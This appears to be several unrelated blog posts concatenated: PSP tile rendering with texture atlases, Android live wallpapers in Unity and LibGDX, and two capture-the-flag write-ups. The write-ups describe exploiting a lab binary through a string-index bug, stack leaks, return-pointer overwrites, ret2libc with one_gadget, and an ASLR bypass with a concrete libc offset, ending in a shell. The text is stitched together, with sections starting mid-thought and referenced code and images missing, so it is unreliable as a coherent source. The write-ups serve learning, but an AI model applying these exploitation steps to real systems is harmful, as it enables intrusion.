Here I am presenting my experiences implementing one of the base functionalities in Spelunky-PSP, which I am currently developing – tile rendering.
It is written as a narration, as that makes even a dull essay a little more joyful.
Back to the basics
Say, you want to draw a single, textured tile in terms of the OpenGL pipeline. Having done the usual boilerplate – creating an OpenGL context, loading a texture from the filesystem, uploading it to the GPU, obtaining a texture ID, binding it to the desired texture slot, writing a dummy shader, compiling and linking the vertex and fragment programs, and binding the final product – you finally end up writing the rendering part.
What you need is a frame to stick your texture on – so you declare a mesh.
As the tile is a quad, you push two triangles to the collection you just created, each made of three vertices, every vertex described by xy and uv coordinates.
The situation is presented by the following image:
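Such a mesh can be sketched as follows – the (x, y, u, v) per-vertex layout and the winding order here are illustrative assumptions, not Spelunky-PSP's actual format:

```python
def make_tile_mesh(x, y, size=1.0):
    """Two triangles forming a textured quad; each vertex is (x, y, u, v)."""
    x2, y2 = x + size, y + size
    return [
        (x,  y,  0.0, 0.0),  # first triangle
        (x2, y,  1.0, 0.0),
        (x2, y2, 1.0, 1.0),
        (x,  y,  0.0, 0.0),  # second triangle
        (x2, y2, 1.0, 1.0),
        (x,  y2, 0.0, 1.0),
    ]
```

Six vertices, each carrying its position and the texture coordinate it samples from.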
You upload the mesh to the GPU, and eventually issue a render call.
Satisfied with results, you go straight for a full tile renderer.
That means a draw call for a 2D list of 32×24 tiles will be dispatched every frame (your total map size is much bigger, but I assume you have already thought of some optimization and batch only the tiles in the camera viewport). Most of the tiles differ in their attached texture, meaning you will have to issue a lot of OpenGL texture binding calls – but you have heard a lot about how premature optimization hurts development, so you dismiss the problem.
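The viewport-culling idea mentioned in passing can be sketched like this – a hypothetical helper (names and parameters are mine, not the project's) computing which tile indices the camera covers:

```python
def visible_range(cam_x, cam_y, view_w, view_h, tile_size, map_w, map_h):
    """Return [start, end) tile-index ranges covered by the camera rectangle."""
    x0 = max(0, int(cam_x // tile_size))
    y0 = max(0, int(cam_y // tile_size))
    x1 = min(map_w, int((cam_x + view_w) // tile_size) + 1)
    y1 = min(map_h, int((cam_y + view_h) // tile_size) + 1)
    return (x0, x1), (y0, y1)
```

Only the tiles inside these ranges would be pushed to the batch each frame.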
After briefly writing your proof of concept, you finally run it on the mobile platform you are targeting. The results are puzzling…
It works, but the FPS counter is below the expected 60, and that’s not even a full game yet.
One idea comes to mind – how about sorting the batch of tiles by texture attachment ID? That would surely reduce the number of individual texture binding calls.
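The effect of such sorting can be illustrated with a toy batch – the dictionary layout is made up for demonstration, and glBindTexture would be issued where the comment stands:

```python
tiles = [
    {"texture_id": 7, "x": 0, "y": 0},
    {"texture_id": 2, "x": 1, "y": 0},
    {"texture_id": 7, "x": 2, "y": 0},
]
tiles.sort(key=lambda t: t["texture_id"])

# Bind a texture only when it differs from the previously bound one:
bind_calls = 0
last_bound = None
for t in tiles:
    if t["texture_id"] != last_bound:
        bind_calls += 1  # glBindTexture(GL_TEXTURE_2D, ...) would go here
        last_bound = t["texture_id"]
```

With the batch sorted, the two tiles sharing texture 7 are adjacent, so only two bindings happen instead of three.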
Again, you apply the performance fix to the renderer and run a profiler.
This time, rendering the very same scene takes 14 milliseconds. That’s more than 60 FPS!
But what about rendering other entities? The player, mobs, monsters, items, particles?
Desperate to gain some time buffer for future additions, you want to improve your tile renderer.
Optimizing render call
What needs to be achieved is minimizing the number of texture binding calls, as each of them is costly.
Sorting did reduce it, but there’s an even more effective method: texture atlases.
If you have all your tiles merged into a single texture, you never have to issue individual texture binding calls again – except a single binding call for the tilesheet.
So you end up sticking two tiles together in your image editor of choice, which can be illustrated by the diagram below:
From this example you can see the rule for calculating normalized UVs for specific tiles.
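That rule can be written down as a small helper – normalized UVs are just pixel coordinates divided by the atlas dimensions (the function name is mine):

```python
def tile_uv(tile_x_px, tile_y_px, tile_size_px, atlas_w_px, atlas_h_px):
    """Convert a tile's pixel rectangle into normalized (u0, v0, u1, v1)."""
    u0 = tile_x_px / atlas_w_px
    v0 = tile_y_px / atlas_h_px
    u1 = (tile_x_px + tile_size_px) / atlas_w_px
    v1 = (tile_y_px + tile_size_px) / atlas_h_px
    return u0, v0, u1, v1

# Two 16x16 tiles merged horizontally into a 32x16 atlas:
left = tile_uv(0, 0, 16, 32, 16)    # (0.0, 0.0, 0.5, 1.0)
right = tile_uv(16, 0, 16, 32, 16)  # (0.5, 0.0, 1.0, 1.0)
```

The left tile spans u ∈ [0, 0.5], the right one u ∈ [0.5, 1].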
Before this can be scaled to rendering more than two tiles, a few things must be noted:
Merging textures together in an image editor is unpleasant and time-costly
Manually calculating UVs for each tile is error-prone and time-costly
Imagine storing an animation for a game character in a manually assembled spritesheet. Suddenly, adding or removing one frame is a massive enterprise, as it involves recalculating UVs by hand and cutting the image.
Surely there must be a piece of software that would automate the process?
Narrator goes off-topic
There are a lot of free programs offering such functionality, and as far as my research goes, atlasc is the one whose traits I prefer most.
Written in C, it can be built from source (with CMake as the build system), needs no external dependencies, and is multiplatform, but what’s most important:
Output image dimensions can be configured. This is important on platforms where the GPU constrains the maximum width/height of uploaded textures, e.g. the PSP supports up to 512×512 pixels.
It outputs image metadata in JSON format, containing each image’s name, width, height, x, y (not normalized) and even a mesh with a complete index buffer.
Padding and border for each sprite can be configured in terms of pixels.
The scale of each sprite in the output image can be configured
Back on the track
Having all this information, you go and happily merge all your tiles using the mentioned atlasc, calling:
You modify the game so it deserializes the outputted JSON at runtime, loading UVs for each tile, and then incorporates them into the created mesh.
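The deserialization step can be sketched as follows – note that the JSON schema here is only a rough approximation in the spirit of atlasc's metadata, not its exact format:

```python
import json

# Hypothetical atlas metadata; the exact schema is an assumption for illustration.
metadata = json.loads("""
{
  "image": {"width": 512, "height": 512},
  "sprites": [
    {"name": "question_mark", "x": 0,  "y": 0, "width": 16, "height": 16},
    {"name": "ladder",        "x": 16, "y": 0, "width": 16, "height": 16}
  ]
}
""")

atlas_w = metadata["image"]["width"]
atlas_h = metadata["image"]["height"]

# Normalize each sprite's pixel rectangle into (u0, v0, u1, v1):
uvs = {
    s["name"]: (s["x"] / atlas_w,
                s["y"] / atlas_h,
                (s["x"] + s["width"]) / atlas_w,
                (s["y"] + s["height"]) / atlas_h)
    for s in metadata["sprites"]
}
```

The resulting dictionary can then be consulted when building each tile's mesh.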
Your tilesheet looks like this:
Finally, you compile the program – now with only one texture binding call in its rendering loop – and run it.
Just as your heartbeat goes up on seeing the render call time drop even below the one after sorting tiles, while moving the camera you discover a problem:
Where did those dark seams between tiles come from?!
There are supposed to be no frames between the question-mark tiles.
Here comes the problem
Initially, you search for the source of the problem in the texture-loading parts of the code, thinking that texture filtering may cause such artifacts.
As your assets are pixel-art style, you choose nearest-neighbour filtering instead of linear filtering, which interpolates between neighbouring texels, blurring those sharp pixel-art edges.
On the left – nearest-neighbour filtering; on the right – linear filtering. Illustration taken from learnopengl.com, which I fully recommend.
That gives a hint – as atlasc outputs UVs in pixels, and during deserialization they are normalized before being passed to the mesh, probably a normalized value goes out of the bounds of its tile, sampling parts of the neighbouring tile. This artifact is called pixel bleeding.
In the case of this question-mark tile, the neighbouring tile is a ladder tile, which would explain the bleeding of this dark frame (scroll up to the tilesheet and see it!).
As you closely examine the outputted tilesheet in an image editor, it looks like when you pass in 16×16 tiles, the texture packer crops them to 15×15, with the UVs still covering 16×16!
Pixel bleeding case, but when using linear filtering: https://gamedev.stackexchange.com/questions/46963/how-to-avoid-texture-bleeding-in-a-texture-atlas
If I were to write a non-pixel-art renderer utilizing linear filtering, and half-pixel correction did not work, I would fight pixel bleeding by scaling the tiles up on output (a feature offered by atlasc) and, when normalizing coordinates, moving the UVs one pixel inwards the tile.
Some very small parts of the image would be lost, but the damage would be minimized by the upscaling.
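That one-pixel inset can be sketched as a variation of the UV-normalization helper (an illustrative sketch, not code from the project):

```python
def inset_uv(x_px, y_px, w_px, h_px, atlas_w, atlas_h, inset_px=1.0):
    """Shrink the sampled region by `inset_px` on every side, so linear
    filtering never reaches into the neighbouring tile."""
    u0 = (x_px + inset_px) / atlas_w
    v0 = (y_px + inset_px) / atlas_h
    u1 = (x_px + w_px - inset_px) / atlas_w
    v1 = (y_px + h_px - inset_px) / atlas_h
    return u0, v0, u1, v1
```

Combined with upscaled output tiles, the one lost pixel on each side corresponds to a fraction of a source pixel, so the visual damage stays small.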
Whether as a means of utility or pure visual amusement, live wallpapers have long felt like a niche to me – stigmatized as battery-draining, or just a triviality, obscured by the fact that no one I know personally uses them.
Only recently I stumbled upon this pure diamond on Github:
…and, refreshing my memories of playing H3:WOG for hours, I asked myself a few questions, including:
How exactly do you develop one?
What have people already accomplished, in terms of creativity, in this field?
Well, the first answer can be handed right away.
It boils down to creating an application that:
Runs always, even in the background – achieved by creating a Service
Does not create a window of its own, but draws on an existing surface supplied by the system – achieved by making that Service extend specifically WallpaperService.
The only thing you need to do is provide implementations for a few methods (e.g. run, onTouchEvent, onVisibilityChanged) of the Android SDK’s abstract classes WallpaperService and WallpaperService.Engine, and update your manifest file.
This can be done in any tool of your choice – whether you’re developing in Unity, LibGDX or Android Studio, when deploying to Android you can always override the default manifest file and provide additional Java files.
Actually, it is so simple that I created a repository with template files for live wallpapers using the mentioned technologies:
Once you install such an application, it will be visible in your device’s wallpaper browser.
Coming to my second question – if it’s so easily accessible, then there must be tons of live wallpapers whose creativity didn’t simply end at:
Let’s take an image, split it into layers, and add a parallax effect!
And that is correct. There’s a wallpaper that takes a GLSL shader on input and uses it as output. Another one is an iteration of John Conway’s classic 1970 Game of Life. The one after draws Conky-like utility information (RAM, CPU, network usage); yet another opens a random Wikipedia article (I would fancy one that opened CPP-reference, though).
After covering live wallpapers in Android Studio (which I recommend reading, for the sake of having a reference for the concepts I will use in this post), I had some understanding of what I wanted to do in Unity, which was:
Override the default AndroidManifest.xml that Unity creates
Add one custom Java class that I will reference from the overridden manifest
Add another resource xml file
Additionally, as Unity creates its own Activity when exporting an Android project, I wanted to reference that activity from the Service declared in my Java class, so I could render a Unity scene when running as a wallpaper.
So I created a clean new Unity project and set up building for Android.
After some quick Googling, it looked like adding my custom Android-specific code to the Unity project would essentially be… creating an Assets/Plugins/Android directory (from the root of the project) and copying my files there.
When listing files from that directory:
So what I did was copy the res directory and the *.java files from my Android Studio project, omitting SimpleWallpaperActivity.java, as Unity provides its own Activity.
I also omitted the AndroidManifest.xml file – the one provided by Unity (when exporting an Android project) was a bit bloated, so it was more efficient to copy only the very specific content I needed into Unity’s manifest: the whole service tag and the uses-feature tag from my Android Studio project.
What was still needed at this point was referencing Unity’s activity to render the scene.
As I don’t normally use Unity, I gave up after some time and found an existing wallpaper service that utilizes Unity’s activity, by PavelDoGreat:
Creating a live wallpaper in LibGDX is only a step further from creating one with Android Studio’s no-activity template (I suggest having a look at my post covering it, as I will mention concepts that I explain there).
There’s a service, but it does not extend WallpaperService directly – it extends LibGDX’s AndroidLiveWallpaperService, which in fact derives from WallpaperService.
There’s no simple Activity extending Activity – there’s one that extends AndroidApplication.
There’s an AndroidManifest.xml with the very same changes as in the Android Studio project, and drawing happens in LibGDX’s core project (as LibGDX is multi-platform, it generates android/ios/core/desktop/html projects, where core shares the common part and the others are mostly stubs for launching on a specific platform).
Why do we need an Activity and a Service? Android SDK defines them as:
An Activity is a single, focused thing that the user can do. Almost all activities interact with the user, so the Activity class takes care of creating a window for you in which you can place your UI with setContentView(View). (…) The Activity class is an important part of an application’s overall lifecycle, and the way activities are launched and put together is a fundamental part of the platform’s application model. For a detailed perspective on the structure of an Android application and how activities behave, please read the Application Fundamentals and Tasks and Back Stack developer guides.
A Service is an application component that can perform long-running operations in the background, and it doesn’t provide a user interface. Another application component can start a service, and it continues to run in the background even if the user switches to another application. Additionally, a component can bind to a service to interact with it and even perform interprocess communication (IPC). For example, a service can handle network transactions, play music, perform file I/O, or interact with a content provider, all from the background.
So adding a single Activity is required, while Services are optional and needed only in special cases.
From the Service’s description one can understand why live wallpapers need them:
they have to do work in background, unlike most of other Android applications or games.
The SDK provides a special kind of Service – WallpaperService – which, once implemented, will do the effort of drawing when visible.
Documentation describes it as:
A wallpaper service is responsible for showing a live wallpaper behind applications that would like to sit on top of it. This service object itself does very little — its only purpose is to generate instances of Engine as needed. Implementing a wallpaper thus involves subclassing from this, subclassing an Engine implementation, and implementing onCreateEngine() to return a new instance of your engine.
Now, knowing what the files we’ve just created are supposed to contain, let’s provide some source.
SimpleWallpaperActivity.java will be as simple as:
…since we don’t need our wallpaper to contain any UI when running as an application (yes, it will still be runnable and visible in your device’s app list, and besides, this activity will be run when the user requests the wallpaper’s settings, as you will find out later).
The real work is done in SimpleWallpaperService.java:
For simplicity I did not bother to use OpenGL in this example, so you will have to make do with draw calls to Android’s Canvas instance.
Instances of the SDK’s Handler and Java’s Runnable are created to handle drawing outside of the overridden methods – the handler acts as a queue for draw() commands.
Under src/main/res/xml/ create wallpaper.xml:
The comment I added in the xml itself says everything.
Finally, create AndroidManifest.xml:
There are 3 notable points in this manifest file that distinguish it from an ordinary application:
the uses-feature tag in line 39, which requires a device capable of displaying live wallpapers
the service tag starting at line 8, requiring the BIND_WALLPAPER permission
the meta-data tag, which points to the activity that is run when the user requests the wallpaper’s settings
You may wonder why they would include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, let’s see what changed in the source compared to stringmaster1:
There are two differences:
Code – there’s no spawn_shell function provided this time, so we can’t dump its address and overwrite the return pointer of the play function with it.
Security measures – the binary is compiled with PIE and stack protector enabled.
PIE stands for Position Independent Executable – which relates to PIC, Position Independent Code, since PIEs are entirely made of PIC.
You can check how it works on Wikipedia, but what it changes in the context of solving this CTF is:
Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary like in the 1996 task.
We can’t just break at an arbitrarily chosen address using gdb – though we could work around that by recompiling our local stringmaster2 binary if we really wanted to do some inspection.
If the stack protector is enabled, another value, called a stack canary, is placed on the stack frame before the return address and (optionally) the frame pointer. Since a buffer overflow attack that redirects code execution, like the one in the 1996 writeup, overwrites bytes from some variable’s address on the stack up to the return pointer, the values in between will be overwritten too, and thus the stack canary will change its value.
The compiler injects code that checks whether that value has changed, and if so, it terminates the program to prevent exploitation.
You can read more about that on Wikipedia:
But the good news is – these are no obstacles. Like in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be overwritten until we specifically do it. As for the PIC problem – we don’t have the spawn_shell function in the binary anyway, so we’ll need to return somewhere else – but where?
Return to libc
The return-to-libc (ret2libc) technique is based on replacing the return pointer’s value with an address from the C library – it may be the execve function (the same one called by spawn_shell in stringmaster1), any other function, or even a specific line of code within those functions!
Calling execve this way would involve overwriting:
The return pointer, previously storing the address of a line in the main function to which the call from play will return.
It would be overwritten with the address of the execve function (8 bytes).
The address after that would need to point to a literal with “/bin/bash” (where we would find it – later) – 8 bytes.
Again, a pointer to the “/bin/bash” literal – 8 bytes.
Pointer to NULL, which would be 8 zeroed bytes.
Again, pointer to NULL – 8 zeroed bytes.
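Packing those five 8-byte values can be sketched in Python – the two addresses below are fabricated placeholders, not values from a real run:

```python
import struct

# Fabricated placeholder addresses – in a real attack these would be
# recovered from the leak and the libc binary:
execve_addr = 0x7F0000051234  # address of execve inside libc
binsh_addr  = 0x7F00001B3E1A  # address of a "/bin/bash" literal in libc

# The 40 bytes described above, as five little-endian 64-bit words:
fake_stack = struct.pack(
    "<5Q",
    execve_addr,  # overwrites the return pointer
    binsh_addr,   # pointer to "/bin/bash"
    binsh_addr,   # pointer to "/bin/bash", again
    0,            # NULL
    0,            # NULL, again
)
```

Forty bytes in total – which, as explained below, is exactly why this plan is too fragile to carry out with the game's swap/replace commands.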
Where can we find the execve address?
Where can we find the “/bin/bash” literal I mentioned?
It’s in the libc, just like execve – but how did it get there?
grep -rni . -e “/bin/sh” recursively searches for “/bin/sh” in the current path.
As you can see, there are some execve calls with const char literals “/bin/sh” passed as an argument, which means those literals will eventually be stored in a read-only data section of the libc .so file, with pointers to them pushed onto the stack when one of those specific calls happens.
Now that we know how to manually craft a function call to execve with “/bin/bash” as an argument, I will tell you why we won’t do it in this case – though what we’ve learned will come in handy, since what we’ll really do is very similar.
See, last time, in stringmaster1, swapping bytes to make the return pointer hold the address of spawn_shell was very unstable – the program crashed at random, and we only had to swap 8 bytes!
Swapping all the bytes of our manually crafted call stack would mean swapping 40 bytes, not to mention that we would need to have those 40, mostly different, values somewhere on the leaked stack (and that involves a lot of luck).
What if there were a way to jump directly to the place in libc where execve(“/bin/bash”) is called (already with the argument on the stack!), just as we’ve seen in the libc sources, without planting function arguments?
Return Oriented Programming
ROP is the technique I’ve just suggested. Find some place in the existing code that you want to execute, get its address and jump to it. The places that can be jumped to are called ROP gadgets.
We won’t waste time finding it manually, since there is already a tool made specifically for finding execve gadgets (though I’ll write another post about this later) – it’s called one_gadget and can be downloaded here: https://github.com/david942j/one_gadget
After installation, we call one_gadget with the path to our libc as an argument:
That’s it – we’ve been provided with 3 variants, differing in what values the registers hold at the call site. We’ll use the first one, but it makes no difference which one we pick.
Return to the plan
So we could use the same Python exploit we used before, just substituting another value for the return pointer (this time the gadget’s address instead of spawn_shell’s), couldn’t we?
Er, no. There’s one last thing I didn’t mention – ASLR, which stands for Address Space Layout Randomization.
The gadget’s address we just took from the libc is not really absolute – it accounts only for the distance from the beginning of the .so file.
It would be valid only if we added the libc base address to it (the address at which libc is loaded in the process), and the base address changes due to ASLR every time we run the application!
See how the base address changes (ldd resolves the libraries and prints the addresses at which they would be loaded):
As an experiment, let’s temporarily disable ASLR and invoke ldd once again:
As you can see, this time the addresses don’t change – how easy it would be to exploit without ASLR! We could just take this permanent libc base address, add the offset of our gadget, and run a Python script that would change the return pointer value.
So how do we defeat ASLR?
Let’s have a detailed look at what’s on the stack of a very simple program:
I’ve printed the first 20 addresses on the stack while breakpointed in the main function. As you see, we have plenty of addresses that refer to the C library!
The first one, __libc_csu_init, is the frame pointer of our stack frame; the second one, <__libc_start_main+231>, is the return pointer – the 231 part means it points to the 231st byte after the beginning of that function. So we return into the libc function that called our main when bootstrapping the process!
If you want details on why those addresses are there (not of much relevance for solving this task), you can see the answer I gave on Stack Overflow:
At which position will we find <__libc_start_main+231> in stringmaster2’s leak?
At the same one we used before – the 18th octet of the leaked data is the return pointer, and the program tries to return to <__libc_start_main+231>.
The final algorithm is the same as in stringmaster1, but with an extra step before replacing the return pointer, because we need to calculate the value to replace it with:
Get the integer value from the 8 bytes starting at index (17 * 8) of the leaked bytes array
Subtract 0x21B97 from that value and assign it to libc_base
The bytes for further replacing are [libc_base + gadget_addr]
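The calculation can be sketched as follows – the leaked value is fabricated for illustration, 0x21B97 is the offset used above, and the gadget offset is a stand-in for whatever one_gadget reported for your libc:

```python
import struct

# A fabricated 8-byte little-endian leak standing in for the real one:
leaked = struct.pack("<Q", 0x7F1234585B97)

LIBC_START_MAIN_RET_OFF = 0x21B97  # offset of <__libc_start_main+231> in this libc
GADGET_OFF = 0x4F2C5               # stand-in for the one_gadget offset

ret_addr = struct.unpack("<Q", leaked)[0]
libc_base = ret_addr - LIBC_START_MAIN_RET_OFF
gadget_addr = libc_base + GADGET_OFF
```

Note that the recovered base is page-aligned, as a loaded library base should be – a quick sanity check worth keeping in the real script.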
That’s how ASLR can be defeated – by leaking some address from libc that we know what it points to (<__libc_start_main+231> in this case).
This time I moved the command-sending part into a Client class, but in its essence the code is almost like stringmaster1’s, besides calculating the libc base.
So far, this was the most complex task, since it involved:
Knowing how libc bootstraps processes – their flow starts not in your main function, but in __libc_start_main, which then redirects flow to your main and finally receives control back at <__libc_start_main+231> when your main returns.
You can read more on that on this excellent blog: http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html
Knowing that, because of ASLR, you can’t just use some address extracted from libc without knowing the base at which libc is loaded in the current process instance.
Knowing about ROP gadgets, since crafting a call stack for execve by yourself is too unstable to work with the given commands (swapping/replacing bytes on the stack).
If you’re curious how it is that one process can use libc at a different address in every instance while its code itself does not change – read about the Global Offset Table and the Procedure Linkage Table:
As this task is one category higher than the last one (very easy -> easy), I wrote a separate blog post about std::string, as some knowledge of it is required for this task – I assume you’ve already read it.
After cd-ing to this task’s distrib directory, we’ll see a binary and C++ source code, from which we know that this binary already provides a spawn_shell function (though it does not call it anywhere) and consists of 2 other functions – play() and main():
As the play function contains much boilerplate, I’ll omit the noise and post only the most important code, from which we’ll deduce a vector of attack:
Before I tell you how to exploit the vulnerability visible in this picture, let’s first run the binary to see what it prints:
As you can see, it’s a simple game of making two strings equal by gradually replacing/swapping characters.
Now, going back to the code from the image before – you may have already noticed that the “replace” command does not provide any sanitization of the returned index! If you input a character that does not exist in the string, the search is going to return std::string::npos, which is 8 bytes of 0xFF – 0xFFFFFFFFFFFFFFFF.
That means that if we try to access
[string’s data pointer address] + [0xFFFFFFFFFFFFFFFF]
we’re going to end up with…
[string’s data pointer address] minus one byte!
If you don’t get it, I explained pointer overflow in the post linked above.
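The wraparound itself is easy to verify with plain integer arithmetic:

```python
# 64-bit pointer arithmetic wraps around, so adding std::string::npos
# (0xFFFFFFFFFFFFFFFF) to an address is the same as subtracting 1:
NPOS = 0xFFFFFFFFFFFFFFFF
ptr = 0x00007FFD4A2B3C40  # an example data-pointer value
wrapped = (ptr + NPOS) % 2**64
```

Since the address space is 2^64 bytes, adding 2^64 − 1 modulo 2^64 lands exactly one byte before the pointer.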
As a consequence, we’re going to end up writing into the last byte of the string’s length field. That will make the string’s length hold a ridiculously high value, and allow us to print far more data with the “print” command:
You may wonder – what use do we have for this seemingly random data?
Vector of attack – return pointer overflow
This data provides us 2 important facts:
the position of the return pointer of the play function;
we’ll inject spawn_shell’s address there.
the position and value of a set of bytes that we can use with the “swap” command;
we’ll use them to swap the bytes of play’s return pointer
Of course, we won’t do this manually, as it’s too cumbersome. We’ll write a Python script for that, but first we’ll need 2 more facts that gdb is going to provide:
the address of the spawn_shell function;
the address of the instruction that comes just after the call to the play function in main; it’s going to be the value of the return pointer in play – from that we’ll know which bytes to swap to make it return to spawn_shell instead
The first one is a simple matter of:
spawn_shell’s address is 0x00000000004011a7 (left-padded to 16 hex digits, since it’s an x86_64 platform I’m working on).
For the second one, we’ve got to disassemble main and find the call to the play function:
As you see, the return pointer’s value is going to be 0x000000000040246d.
Now we have all the information we need; it’s time for the python script.
I won’t comment on it much since it’s self-explanatory, but the algorithm is:
Connect to the program (it’s running in a Docker image on port 22224)
Wait until it sends the command prompt text (and do so after sending each command)
Send ‘replace X a’ – X because there are no uppercase characters in those strings, so it’s always safe to pick one; ‘a’ because the program seemingly doesn’t crash as much when replacing with a’s – but it’s an arbitrarily chosen character, any other will do.
Send a ‘print’ request to get the data that lies after the string’s local data pointer
Find the index of the return pointer (0x40246d) in what ‘print’ returned – I found it manually by printing a hex dump of the returned data to the console before writing the rest of the script, and just hardcoded it, but one could easily code the search.
Find the indexes of the 0x40, 0x11 and 0xa7 bytes. There’s a chance they’ll be somewhere in the program’s memory, and a chance they won’t. If not, just restart the exploit, since the stringmaster1 binary is re-spawned on every connection.
Replace the return pointer bytes with the bytes at the indexes we found in the last step
Send ‘exit’ to make it return to spawn_shell
Send ‘cat flag.txt’
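A skeleton of the network plumbing for such a script might look like this – the prompt marker is an assumption about what the game prints, and the helper names are mine:

```python
import socket

HOST, PORT = "127.0.0.1", 22224  # the task's Docker container

def recv_until(sock, marker: bytes) -> bytes:
    """Read from the socket until the given marker (e.g. the prompt) arrives."""
    data = b""
    while not data.endswith(marker):
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    return data

def send_cmd(sock, cmd: str, prompt: bytes = b"> ") -> bytes:
    """Send one command line and collect output up to the next prompt."""
    sock.sendall(cmd.encode() + b"\n")
    return recv_until(sock, prompt)

# Usage sketch (against the running container):
# with socket.create_connection((HOST, PORT)) as s:
#     recv_until(s, b"> ")
#     leak = send_cmd(s, "print")
```

Each step of the algorithm above then becomes one send_cmd call, with the ‘print’ output parsed for the return pointer and the bytes to swap.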
Docker was convenient, but I’ll try to implement hacking the binary without Docker – hooking the Python script to stdout, without sockets, just for further experiments.
Also, my python skills need some improvement.